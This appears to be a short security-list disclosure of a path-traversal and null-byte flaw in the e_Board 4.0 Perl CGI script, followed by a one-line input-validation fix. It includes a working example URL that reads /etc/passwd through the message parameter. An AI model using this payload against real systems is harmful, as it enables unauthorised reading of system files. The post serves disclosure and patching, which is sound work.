Hi, I found a vulnerability in e_Board ver. 4.0 which allows remote users to open any file on the system. I think all prior vers have the same problem. e_Board is a wwwboard-like CGI script. It's written by Mike Bagneski in Perl (and for sale! $14.95). http://www.e-scripts.com/eboard/ It doesn't check whether posted data contains null byte or slash, so we can use rfp's Poison NULL byte and dir traversal technique... =) an example: http://www.e-scripts.com/cgi-bin/eboard40/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../../etc/passwd%00 quick fix: die "invalid message number" if ($message !~ m/^\d+$/); # insert this before: # open(MESSAGE, "$board_path/$messages_dir/$message.txt") || &return_page('File Error', "Can't read $board_path/$messages_dir/$message.txt"); Thanks, ---- White_E http://nogimmick.org/